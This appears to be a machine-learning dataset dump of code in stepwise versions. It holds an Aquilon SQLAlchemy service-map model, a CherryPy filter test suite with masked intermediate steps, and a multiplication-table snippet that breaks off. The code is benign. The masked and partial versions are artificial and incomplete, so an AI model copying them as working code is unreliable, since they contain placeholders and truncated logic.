host_environment=None):\n if network and location:\n raise AquilonError(\n \"A service can't be mapped to a Network and a Location at the same time\"\n )\n if network is None and location is None:\n raise AquilonError(\n 'A service should by mapped to a Network or a Location')\n if personality and host_environment:\n raise AquilonError(\n \"A service can't be mapped to a Personality and a HostEnvironment at the same time\"\n )\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location, personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n session = object_session(dbservice)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.\n host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), lazyload('service_instance.service'))\n instances = []\n min_seen_priority = maxsize,\n for map in q:\n si = map.service_instance\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n elif min_seen_priority == map.priority:\n instances.append(si)\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n session = object_session(dblocation)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n PSLI = PersonalityServiceListItem\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in\n dbservices))\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n q = q.filter(or_(and_(ServiceMap.personality_id == null(), \n ServiceMap.host_environment_id == null()), ServiceMap.\n personality == dbstage.personality, ServiceMap.\n host_environment_id == coalesce(PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n if dbnetwork:\n q = q.filter(or_(ServiceMap.location_id.in_(location_ids), \n ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), undefer(\n 'service_instance._client_count'), lazyload(\n 'service_instance.service'))\n instance_cache = {}\n instance_priority = defaultdict(lambda : (maxsize,))\n for map in q:\n si = map.service_instance\n service = si.service\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n return instance_cache\n",
"step-5": "# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-\n# ex: set expandtab softtabstop=4 shiftwidth=4:\n#\n# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016 Contributor\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\" Maps service instances to locations. See class.__doc__ \"\"\"\n\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom sys import maxsize\n\nfrom sqlalchemy import (Column, Integer, Sequence, DateTime, ForeignKey,\n UniqueConstraint, CheckConstraint)\nfrom sqlalchemy.orm import (relation, deferred, backref, defer, undefer,\n lazyload, contains_eager, object_session)\nfrom sqlalchemy.sql import and_, or_, null, case\nfrom sqlalchemy.sql.functions import coalesce\n\nfrom aquilon.exceptions_ import InternalError, AquilonError\nfrom aquilon.aqdb.model import (Base, Location, Desk, Rack, Room, Bunker,\n Building, City, Campus, Country, Continent, Hub,\n Organization, ServiceInstance, Network, Personality,\n PersonalityServiceListItem, HostEnvironment)\n\n_TN = 'service_map'\n\n# TODO: We could calculate this map by building a graph of Location subclasses\n# using Location.valid_parents as edges, and then doing a topological sort\n# NOTE: The actual values here are unimportant, what matters is their order\n_LOCATION_PRIORITY = {\n # Rack and Desk are at the same level\n Rack: 1000,\n Desk: 1000,\n Room: 1100,\n Bunker: 1200,\n Building: 1300,\n City: 1400,\n Campus: 1500,\n Country: 1600,\n Continent: 1700,\n Hub: 1800,\n Organization: 1900,\n}\n\n# NOTE: The actual value here is unimportant, what matters is the order wrt.\n# location-based priorities\n_NETWORK_PRIORITY = 100\n\n# NOTE: The actual values here are unimportant, only their order matters\n_TARGET_PERSONALITY = 10\n_TARGET_ENVIRONMENT = 100\n_TARGET_GLOBAL = 1000\n\n\nclass ServiceMap(Base):\n \"\"\" Service Map: mapping a service_instance to a location.\n The rows in this table assert that an instance is a valid useable\n default that clients can choose as their provider during service\n autoconfiguration.\n\n The contained information is actually a triplet:\n - The service instance to use,\n - Rules for the scope where the map is valid,\n - Rules for which objects does the map apply.\n \"\"\"\n\n __tablename__ = _TN\n\n id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)\n\n service_instance_id = Column(ForeignKey(ServiceInstance.id,\n ondelete='CASCADE'),\n nullable=False)\n\n personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),\n nullable=True, index=True)\n\n host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)\n\n location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),\n nullable=True, index=True)\n\n network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),\n nullable=True, index=True)\n\n creation_date = deferred(Column(DateTime, default=datetime.now,\n nullable=False))\n\n service_instance = relation(ServiceInstance, innerjoin=True,\n backref=backref('service_map',\n cascade=\"all, 
delete-orphan\",\n passive_deletes=True))\n personality = relation(Personality)\n host_environment = relation(HostEnvironment)\n location = relation(Location)\n network = relation(Network)\n\n __table_args__ = (UniqueConstraint(service_instance_id,\n personality_id, host_environment_id,\n location_id, network_id,\n name='%s_uk' % _TN),\n # At most one of personality_id and host_environment_id\n # can be not NULL\n CheckConstraint(case([(personality_id != null(), 1)], else_=0) +\n case([(host_environment_id != null(), 1)], else_=0) <= 1,\n name='%s_target_ck' % _TN))\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError: # pragma: no cover\n raise InternalError(\"The service map is not prepared to handle \"\n \"location class %r\" % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return (self.object_priority, self.scope_priority)\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None, personality=None,\n host_environment=None):\n if network and location: # pragma: no cover\n raise AquilonError(\"A service can't be mapped to a Network and a \"\n \"Location at the same time\")\n\n if network is None and location is None: # pragma: no cover\n raise AquilonError(\"A service should by mapped to a Network or a \"\n \"Location\")\n\n if personality and host_environment: # pragma: no cover\n raise AquilonError(\"A service can't be mapped to a Personality and \"\n \"a HostEnvironment at the same time\")\n\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location,\n personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n # Simplified service map lookup - single service, location-based maps\n # only, no client bindings\n session = object_session(dbservice)\n\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(),\n ServiceMap.host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'),\n defer('service_instance.comments'),\n lazyload('service_instance.service'))\n\n instances = []\n min_seen_priority = (maxsize,)\n\n # We want the instance(s) with the lowest priority\n for map in q:\n si = map.service_instance\n\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n elif min_seen_priority == map.priority:\n instances.append(si)\n\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n\n session = object_session(dblocation)\n\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n\n PSLI = PersonalityServiceListItem\n\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q 
= q.filter(ServiceInstance.service_id.in_(srv.id for srv in dbservices))\n\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n\n # Rules for filtering by target object\n q = q.filter(or_(\n and_(ServiceMap.personality_id == null(),\n ServiceMap.host_environment_id == null()),\n ServiceMap.personality == dbstage.personality,\n ServiceMap.host_environment_id == coalesce(\n PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n\n # Rules for filtering by location/scope\n if dbnetwork:\n q = q.filter(or_(ServiceMap.location_id.in_(location_ids),\n ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n\n q = q.options(contains_eager('service_instance'),\n defer('service_instance.comments'),\n undefer('service_instance._client_count'),\n lazyload('service_instance.service'))\n\n instance_cache = {}\n instance_priority = defaultdict(lambda: (maxsize,))\n\n # For every service, we want the instance(s) with the lowest priority\n for map in q:\n si = map.service_instance\n service = si.service\n\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n\n return instance_cache\n",
"step-ids": [
9,
10,
11,
13,
14
]
}
|
[
9,
10,
11,
13,
14
] |
"""Test the various means of instantiating and invoking filters."""
import types
import test
test.prefer_parent_path()
import cherrypy
from cherrypy import filters
from cherrypy.filters.basefilter import BaseFilter
class AccessFilter(BaseFilter):
def before_request_body(self):
if not cherrypy.config.get("access_filter.on", False):
return
if not getattr(cherrypy.request, "login", None):
raise cherrypy.HTTPError(401)
def setup_server():
class Numerify(BaseFilter):
def on_start_resource(self):
m = cherrypy.config.get("numerify_filter.map", {})
cherrypy.request.numerify_map = m.items()
def before_finalize(self):
if not cherrypy.config.get("numerify_filter.on", False):
return
def number_it(body):
for chunk in body:
for k, v in cherrypy.request.numerify_map:
chunk = chunk.replace(k, v)
yield chunk
cherrypy.response.body = number_it(cherrypy.response.body)
# It's not mandatory to inherit from BaseFilter.
class NadsatFilter:
def __init__(self):
self.counter = 0
self.ended = {}
def before_main(self):
cherrypy.request.counter = self.counter = self.counter + 1
self.ended[cherrypy.request.counter] = False
def before_finalize(self):
def nadsat_it_up(body):
for chunk in body:
chunk = chunk.replace("good", "horrorshow")
chunk = chunk.replace("piece", "lomtick")
yield chunk
cherrypy.response.body = nadsat_it_up(cherrypy.response.body)
def on_end_request(self):
# This runs after the request has been completely written out.
cherrypy.response.body = "razdrez"
self.ended[cherrypy.request.counter] = True
class Root:
def index(self):
return "Howdy earth!"
index.exposed = True
cherrypy.root = Root()
class TestType(type):
"""Metaclass which automatically exposes all functions in each subclass,
and adds an instance of the subclass as an attribute of cherrypy.root.
"""
def __init__(cls, name, bases, dct):
type.__init__(name, bases, dct)
for value in dct.itervalues():
if isinstance(value, types.FunctionType):
value.exposed = True
setattr(cherrypy.root, name.lower(), cls())
class Test(object):
__metaclass__ = TestType
class CPFilterList(Test):
# METHOD ONE:
# Use _cp_filters (old name: _cpFilterList)
_cp_filters = [NadsatFilter()]
def index(self):
return "A good piece of cherry pie"
def ended(self, id):
return repr(self._cp_filters[0].ended[int(id)])
def err(self):
raise ValueError()
def errinstream(self):
raise ValueError()
yield "confidential"
def restricted(self):
return "Welcome!"
def err_in_onstart(self):
return "success!"
cherrypy.config.update({
'global': {
# METHOD TWO:
# Declare a classname in server.input_filters.
'server.input_filters': ["cherrypy.test.test_custom_filters.AccessFilter"],
'server.log_to_screen': False,
'server.environment': 'production',
'server.show_tracebacks': True,
},
'/cpfilterlist': {
'numerify_filter.on': True,
'numerify_filter.map': {"pie": "3.14159"}
},
'/cpfilterlist/restricted': {
'access_filter.on': True,
'server.show_tracebacks': False,
},
'/cpfilterlist/errinstream': {
'stream_response': True,
},
'/cpfilterlist/err_in_onstart': {
# Because this isn't a dict, on_start_resource will error.
'numerify_filter.map': "pie->3.14159"
},
})
# METHOD THREE:
# Insert a class directly into the filters.output_filters chain.
# You can also insert a string, but we're effectively testing
# using-a-string via the config file.
filters.input_filters.insert(0, Numerify)
filters.output_filters.insert(0, Numerify)
# We have to call filters.init() here (if we want methods #2 and #3
# to work), because the test suite may already have run server.start()
# (which is where filters.init() is usually called).
filters.init()
# Client-side code #
import helper
class FilterTests(helper.CPWebCase):
def testCPFilterList(self):
self.getPage("/cpfilterlist/")
# If body is "razdrez", then on_end_request is being called too early.
self.assertBody("A horrorshow lomtick of cherry 3.14159")
# If this fails, then on_end_request isn't being called at all.
self.getPage("/cpfilterlist/ended/1")
self.assertBody("True")
valerr = '\n raise ValueError()\nValueError'
self.getPage("/cpfilterlist/err")
# If body is "razdrez", then on_end_request is being called too early.
self.assertErrorPage(500, pattern=valerr)
# If this fails, then on_end_request isn't being called at all.
self.getPage("/cpfilterlist/ended/3")
self.assertBody("True")
# If body is "razdrez", then on_end_request is being called too early.
self.getPage("/cpfilterlist/errinstream")
# Because this error is raised after the response body has
# started, the status should not change to an error status.
self.assertStatus("200 OK")
self.assertBody("Unrecoverable error in the server.")
# If this fails, then on_end_request isn't being called at all.
self.getPage("/cpfilterlist/ended/5")
self.assertBody("True")
# Test the config method.
self.getPage("/cpfilterlist/restricted")
self.assertErrorPage(401)
def testGuaranteedFilters(self):
# The on_start_resource and on_end_request filter methods are all
# guaranteed to run, even if there are failures in other on_start
# or on_end methods. This is NOT true of the other filter methods.
# Here, we have set up a failure in NumerifyFilter.on_start_resource,
# but because that failure is logged and passed over, the error
# page we obtain in the user agent should be from before_finalize.
self.getPage("/cpfilterlist/err_in_onstart")
self.assertErrorPage(500)
self.assertInBody("AttributeError: 'Request' object has no "
"attribute 'numerify_map'")
if __name__ == '__main__':
setup_server()
helper.testmain()
|
normal
|
{
"blob_id": "8a412231c13df1b364b6e2a27549730d06048186",
"index": 9978,
"step-1": "<mask token>\n\n\nclass AccessFilter(BaseFilter):\n <mask token>\n\n\n<mask token>\n\n\nclass FilterTests(helper.CPWebCase):\n\n def testCPFilterList(self):\n self.getPage('/cpfilterlist/')\n self.assertBody('A horrorshow lomtick of cherry 3.14159')\n self.getPage('/cpfilterlist/ended/1')\n self.assertBody('True')\n valerr = '\\n raise ValueError()\\nValueError'\n self.getPage('/cpfilterlist/err')\n self.assertErrorPage(500, pattern=valerr)\n self.getPage('/cpfilterlist/ended/3')\n self.assertBody('True')\n self.getPage('/cpfilterlist/errinstream')\n self.assertStatus('200 OK')\n self.assertBody('Unrecoverable error in the server.')\n self.getPage('/cpfilterlist/ended/5')\n self.assertBody('True')\n self.getPage('/cpfilterlist/restricted')\n self.assertErrorPage(401)\n\n def testGuaranteedFilters(self):\n self.getPage('/cpfilterlist/err_in_onstart')\n self.assertErrorPage(500)\n self.assertInBody(\n \"AttributeError: 'Request' object has no attribute 'numerify_map'\")\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass AccessFilter(BaseFilter):\n\n def before_request_body(self):\n if not cherrypy.config.get('access_filter.on', False):\n return\n if not getattr(cherrypy.request, 'login', None):\n raise cherrypy.HTTPError(401)\n\n\n<mask token>\n\n\nclass FilterTests(helper.CPWebCase):\n\n def testCPFilterList(self):\n self.getPage('/cpfilterlist/')\n self.assertBody('A horrorshow lomtick of cherry 3.14159')\n self.getPage('/cpfilterlist/ended/1')\n self.assertBody('True')\n valerr = '\\n raise ValueError()\\nValueError'\n self.getPage('/cpfilterlist/err')\n self.assertErrorPage(500, pattern=valerr)\n self.getPage('/cpfilterlist/ended/3')\n self.assertBody('True')\n self.getPage('/cpfilterlist/errinstream')\n self.assertStatus('200 OK')\n self.assertBody('Unrecoverable error in the server.')\n self.getPage('/cpfilterlist/ended/5')\n self.assertBody('True')\n self.getPage('/cpfilterlist/restricted')\n self.assertErrorPage(401)\n\n def testGuaranteedFilters(self):\n self.getPage('/cpfilterlist/err_in_onstart')\n self.assertErrorPage(500)\n self.assertInBody(\n \"AttributeError: 'Request' object has no attribute 'numerify_map'\")\n\n\n<mask token>\n",
"step-3": "<mask token>\ntest.prefer_parent_path()\n<mask token>\n\n\nclass AccessFilter(BaseFilter):\n\n def before_request_body(self):\n if not cherrypy.config.get('access_filter.on', False):\n return\n if not getattr(cherrypy.request, 'login', None):\n raise cherrypy.HTTPError(401)\n\n\ndef setup_server():\n\n\n class Numerify(BaseFilter):\n\n def on_start_resource(self):\n m = cherrypy.config.get('numerify_filter.map', {})\n cherrypy.request.numerify_map = m.items()\n\n def before_finalize(self):\n if not cherrypy.config.get('numerify_filter.on', False):\n return\n\n def number_it(body):\n for chunk in body:\n for k, v in cherrypy.request.numerify_map:\n chunk = chunk.replace(k, v)\n yield chunk\n cherrypy.response.body = number_it(cherrypy.response.body)\n\n\n class NadsatFilter:\n\n def __init__(self):\n self.counter = 0\n self.ended = {}\n\n def before_main(self):\n cherrypy.request.counter = self.counter = self.counter + 1\n self.ended[cherrypy.request.counter] = False\n\n def before_finalize(self):\n\n def nadsat_it_up(body):\n for chunk in body:\n chunk = chunk.replace('good', 'horrorshow')\n chunk = chunk.replace('piece', 'lomtick')\n yield chunk\n cherrypy.response.body = nadsat_it_up(cherrypy.response.body)\n\n def on_end_request(self):\n cherrypy.response.body = 'razdrez'\n self.ended[cherrypy.request.counter] = True\n\n\n class Root:\n\n def index(self):\n return 'Howdy earth!'\n index.exposed = True\n cherrypy.root = Root()\n\n\n class TestType(type):\n \"\"\"Metaclass which automatically exposes all functions in each subclass,\n and adds an instance of the subclass as an attribute of cherrypy.root.\n \"\"\"\n\n def __init__(cls, name, bases, dct):\n type.__init__(name, bases, dct)\n for value in dct.itervalues():\n if isinstance(value, types.FunctionType):\n value.exposed = True\n setattr(cherrypy.root, name.lower(), cls())\n\n\n class Test(object):\n __metaclass__ = TestType\n\n\n class CPFilterList(Test):\n _cp_filters = [NadsatFilter()]\n\n def index(self):\n return 'A good piece of cherry pie'\n\n def ended(self, id):\n return repr(self._cp_filters[0].ended[int(id)])\n\n def err(self):\n raise ValueError()\n\n def errinstream(self):\n raise ValueError()\n yield 'confidential'\n\n def restricted(self):\n return 'Welcome!'\n\n def err_in_onstart(self):\n return 'success!'\n cherrypy.config.update({'global': {'server.input_filters': [\n 'cherrypy.test.test_custom_filters.AccessFilter'],\n 'server.log_to_screen': False, 'server.environment': 'production',\n 'server.show_tracebacks': True}, '/cpfilterlist': {\n 'numerify_filter.on': True, 'numerify_filter.map': {'pie':\n '3.14159'}}, '/cpfilterlist/restricted': {'access_filter.on': True,\n 'server.show_tracebacks': False}, '/cpfilterlist/errinstream': {\n 'stream_response': True}, '/cpfilterlist/err_in_onstart': {\n 'numerify_filter.map': 'pie->3.14159'}})\n filters.input_filters.insert(0, Numerify)\n filters.output_filters.insert(0, Numerify)\n filters.init()\n\n\n<mask token>\n\n\nclass FilterTests(helper.CPWebCase):\n\n def testCPFilterList(self):\n self.getPage('/cpfilterlist/')\n self.assertBody('A horrorshow lomtick of cherry 3.14159')\n self.getPage('/cpfilterlist/ended/1')\n self.assertBody('True')\n valerr = '\\n raise ValueError()\\nValueError'\n self.getPage('/cpfilterlist/err')\n self.assertErrorPage(500, pattern=valerr)\n self.getPage('/cpfilterlist/ended/3')\n self.assertBody('True')\n self.getPage('/cpfilterlist/errinstream')\n self.assertStatus('200 OK')\n self.assertBody('Unrecoverable error in the 
server.')\n self.getPage('/cpfilterlist/ended/5')\n self.assertBody('True')\n self.getPage('/cpfilterlist/restricted')\n self.assertErrorPage(401)\n\n def testGuaranteedFilters(self):\n self.getPage('/cpfilterlist/err_in_onstart')\n self.assertErrorPage(500)\n self.assertInBody(\n \"AttributeError: 'Request' object has no attribute 'numerify_map'\")\n\n\nif __name__ == '__main__':\n setup_server()\n helper.testmain()\n",
"step-4": "<mask token>\nimport types\nimport test\ntest.prefer_parent_path()\nimport cherrypy\nfrom cherrypy import filters\nfrom cherrypy.filters.basefilter import BaseFilter\n\n\nclass AccessFilter(BaseFilter):\n\n def before_request_body(self):\n if not cherrypy.config.get('access_filter.on', False):\n return\n if not getattr(cherrypy.request, 'login', None):\n raise cherrypy.HTTPError(401)\n\n\ndef setup_server():\n\n\n class Numerify(BaseFilter):\n\n def on_start_resource(self):\n m = cherrypy.config.get('numerify_filter.map', {})\n cherrypy.request.numerify_map = m.items()\n\n def before_finalize(self):\n if not cherrypy.config.get('numerify_filter.on', False):\n return\n\n def number_it(body):\n for chunk in body:\n for k, v in cherrypy.request.numerify_map:\n chunk = chunk.replace(k, v)\n yield chunk\n cherrypy.response.body = number_it(cherrypy.response.body)\n\n\n class NadsatFilter:\n\n def __init__(self):\n self.counter = 0\n self.ended = {}\n\n def before_main(self):\n cherrypy.request.counter = self.counter = self.counter + 1\n self.ended[cherrypy.request.counter] = False\n\n def before_finalize(self):\n\n def nadsat_it_up(body):\n for chunk in body:\n chunk = chunk.replace('good', 'horrorshow')\n chunk = chunk.replace('piece', 'lomtick')\n yield chunk\n cherrypy.response.body = nadsat_it_up(cherrypy.response.body)\n\n def on_end_request(self):\n cherrypy.response.body = 'razdrez'\n self.ended[cherrypy.request.counter] = True\n\n\n class Root:\n\n def index(self):\n return 'Howdy earth!'\n index.exposed = True\n cherrypy.root = Root()\n\n\n class TestType(type):\n \"\"\"Metaclass which automatically exposes all functions in each subclass,\n and adds an instance of the subclass as an attribute of cherrypy.root.\n \"\"\"\n\n def __init__(cls, name, bases, dct):\n type.__init__(name, bases, dct)\n for value in dct.itervalues():\n if isinstance(value, types.FunctionType):\n value.exposed = True\n setattr(cherrypy.root, name.lower(), cls())\n\n\n class Test(object):\n __metaclass__ = TestType\n\n\n class CPFilterList(Test):\n _cp_filters = [NadsatFilter()]\n\n def index(self):\n return 'A good piece of cherry pie'\n\n def ended(self, id):\n return repr(self._cp_filters[0].ended[int(id)])\n\n def err(self):\n raise ValueError()\n\n def errinstream(self):\n raise ValueError()\n yield 'confidential'\n\n def restricted(self):\n return 'Welcome!'\n\n def err_in_onstart(self):\n return 'success!'\n cherrypy.config.update({'global': {'server.input_filters': [\n 'cherrypy.test.test_custom_filters.AccessFilter'],\n 'server.log_to_screen': False, 'server.environment': 'production',\n 'server.show_tracebacks': True}, '/cpfilterlist': {\n 'numerify_filter.on': True, 'numerify_filter.map': {'pie':\n '3.14159'}}, '/cpfilterlist/restricted': {'access_filter.on': True,\n 'server.show_tracebacks': False}, '/cpfilterlist/errinstream': {\n 'stream_response': True}, '/cpfilterlist/err_in_onstart': {\n 'numerify_filter.map': 'pie->3.14159'}})\n filters.input_filters.insert(0, Numerify)\n filters.output_filters.insert(0, Numerify)\n filters.init()\n\n\nimport helper\n\n\nclass FilterTests(helper.CPWebCase):\n\n def testCPFilterList(self):\n self.getPage('/cpfilterlist/')\n self.assertBody('A horrorshow lomtick of cherry 3.14159')\n self.getPage('/cpfilterlist/ended/1')\n self.assertBody('True')\n valerr = '\\n raise ValueError()\\nValueError'\n self.getPage('/cpfilterlist/err')\n self.assertErrorPage(500, pattern=valerr)\n self.getPage('/cpfilterlist/ended/3')\n self.assertBody('True')\n 
self.getPage('/cpfilterlist/errinstream')\n self.assertStatus('200 OK')\n self.assertBody('Unrecoverable error in the server.')\n self.getPage('/cpfilterlist/ended/5')\n self.assertBody('True')\n self.getPage('/cpfilterlist/restricted')\n self.assertErrorPage(401)\n\n def testGuaranteedFilters(self):\n self.getPage('/cpfilterlist/err_in_onstart')\n self.assertErrorPage(500)\n self.assertInBody(\n \"AttributeError: 'Request' object has no attribute 'numerify_map'\")\n\n\nif __name__ == '__main__':\n setup_server()\n helper.testmain()\n",
"step-5": "\"\"\"Test the various means of instantiating and invoking filters.\"\"\"\n\nimport types\nimport test\ntest.prefer_parent_path()\n\nimport cherrypy\nfrom cherrypy import filters\nfrom cherrypy.filters.basefilter import BaseFilter\n\n\nclass AccessFilter(BaseFilter):\n \n def before_request_body(self):\n if not cherrypy.config.get(\"access_filter.on\", False):\n return\n \n if not getattr(cherrypy.request, \"login\", None):\n raise cherrypy.HTTPError(401)\n\n\ndef setup_server():\n\n class Numerify(BaseFilter):\n \n def on_start_resource(self):\n m = cherrypy.config.get(\"numerify_filter.map\", {})\n cherrypy.request.numerify_map = m.items()\n \n def before_finalize(self):\n if not cherrypy.config.get(\"numerify_filter.on\", False):\n return\n \n def number_it(body):\n for chunk in body:\n for k, v in cherrypy.request.numerify_map:\n chunk = chunk.replace(k, v)\n yield chunk\n cherrypy.response.body = number_it(cherrypy.response.body)\n \n \n # It's not mandatory to inherit from BaseFilter.\n class NadsatFilter:\n \n def __init__(self):\n self.counter = 0\n self.ended = {}\n \n def before_main(self):\n cherrypy.request.counter = self.counter = self.counter + 1\n self.ended[cherrypy.request.counter] = False\n \n def before_finalize(self):\n def nadsat_it_up(body):\n for chunk in body:\n chunk = chunk.replace(\"good\", \"horrorshow\")\n chunk = chunk.replace(\"piece\", \"lomtick\")\n yield chunk\n cherrypy.response.body = nadsat_it_up(cherrypy.response.body)\n \n def on_end_request(self):\n # This runs after the request has been completely written out.\n cherrypy.response.body = \"razdrez\"\n self.ended[cherrypy.request.counter] = True\n\n\n\n class Root:\n def index(self):\n return \"Howdy earth!\"\n index.exposed = True\n\n cherrypy.root = Root()\n\n\n class TestType(type):\n \"\"\"Metaclass which automatically exposes all functions in each subclass,\n and adds an instance of the subclass as an attribute of cherrypy.root.\n \"\"\"\n def __init__(cls, name, bases, dct):\n type.__init__(name, bases, dct)\n for value in dct.itervalues():\n if isinstance(value, types.FunctionType):\n value.exposed = True\n setattr(cherrypy.root, name.lower(), cls())\n class Test(object):\n __metaclass__ = TestType\n\n\n class CPFilterList(Test):\n \n # METHOD ONE:\n # Use _cp_filters (old name: _cpFilterList)\n _cp_filters = [NadsatFilter()]\n \n def index(self):\n return \"A good piece of cherry pie\"\n \n def ended(self, id):\n return repr(self._cp_filters[0].ended[int(id)])\n \n def err(self):\n raise ValueError()\n \n def errinstream(self):\n raise ValueError()\n yield \"confidential\"\n \n def restricted(self):\n return \"Welcome!\"\n \n def err_in_onstart(self):\n return \"success!\"\n\n\n cherrypy.config.update({\n 'global': {\n # METHOD TWO:\n # Declare a classname in server.input_filters.\n 'server.input_filters': [\"cherrypy.test.test_custom_filters.AccessFilter\"],\n 'server.log_to_screen': False,\n 'server.environment': 'production',\n 'server.show_tracebacks': True,\n },\n '/cpfilterlist': {\n 'numerify_filter.on': True,\n 'numerify_filter.map': {\"pie\": \"3.14159\"}\n },\n '/cpfilterlist/restricted': {\n 'access_filter.on': True,\n 'server.show_tracebacks': False,\n },\n '/cpfilterlist/errinstream': {\n 'stream_response': True,\n },\n '/cpfilterlist/err_in_onstart': {\n # Because this isn't a dict, on_start_resource will error.\n 'numerify_filter.map': \"pie->3.14159\"\n },\n })\n\n # METHOD THREE:\n # Insert a class directly into the filters.output_filters chain.\n # You can also 
insert a string, but we're effectively testing\n # using-a-string via the config file.\n filters.input_filters.insert(0, Numerify)\n filters.output_filters.insert(0, Numerify)\n\n # We have to call filters.init() here (if we want methods #2 and #3\n # to work), because the test suite may already have run server.start()\n # (which is where filters.init() is usually called).\n filters.init()\n\n\n# Client-side code #\n\nimport helper\n\n\nclass FilterTests(helper.CPWebCase):\n \n def testCPFilterList(self):\n self.getPage(\"/cpfilterlist/\")\n # If body is \"razdrez\", then on_end_request is being called too early.\n self.assertBody(\"A horrorshow lomtick of cherry 3.14159\")\n # If this fails, then on_end_request isn't being called at all.\n self.getPage(\"/cpfilterlist/ended/1\")\n self.assertBody(\"True\")\n \n valerr = '\\n raise ValueError()\\nValueError'\n self.getPage(\"/cpfilterlist/err\")\n # If body is \"razdrez\", then on_end_request is being called too early.\n self.assertErrorPage(500, pattern=valerr)\n # If this fails, then on_end_request isn't being called at all.\n self.getPage(\"/cpfilterlist/ended/3\")\n self.assertBody(\"True\")\n \n # If body is \"razdrez\", then on_end_request is being called too early.\n self.getPage(\"/cpfilterlist/errinstream\")\n # Because this error is raised after the response body has\n # started, the status should not change to an error status.\n self.assertStatus(\"200 OK\")\n self.assertBody(\"Unrecoverable error in the server.\")\n # If this fails, then on_end_request isn't being called at all.\n self.getPage(\"/cpfilterlist/ended/5\")\n self.assertBody(\"True\")\n \n # Test the config method.\n self.getPage(\"/cpfilterlist/restricted\")\n self.assertErrorPage(401)\n \n def testGuaranteedFilters(self):\n # The on_start_resource and on_end_request filter methods are all\n # guaranteed to run, even if there are failures in other on_start\n # or on_end methods. This is NOT true of the other filter methods.\n # Here, we have set up a failure in NumerifyFilter.on_start_resource,\n # but because that failure is logged and passed over, the error\n # page we obtain in the user agent should be from before_finalize.\n self.getPage(\"/cpfilterlist/err_in_onstart\")\n self.assertErrorPage(500)\n self.assertInBody(\"AttributeError: 'Request' object has no \"\n \"attribute 'numerify_map'\")\n\n\nif __name__ == '__main__':\n setup_server()\n helper.testmain()\n\n",
"step-ids": [
4,
5,
7,
8,
9
]
}
|
[
4,
5,
7,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while x < 13:
print(n, ' x ', x, ' = ', n * x)
x = x + 1
<|reserved_special_token_1|>
n = int(input('Enter any int number:\n'))
x = 1
while x < 13:
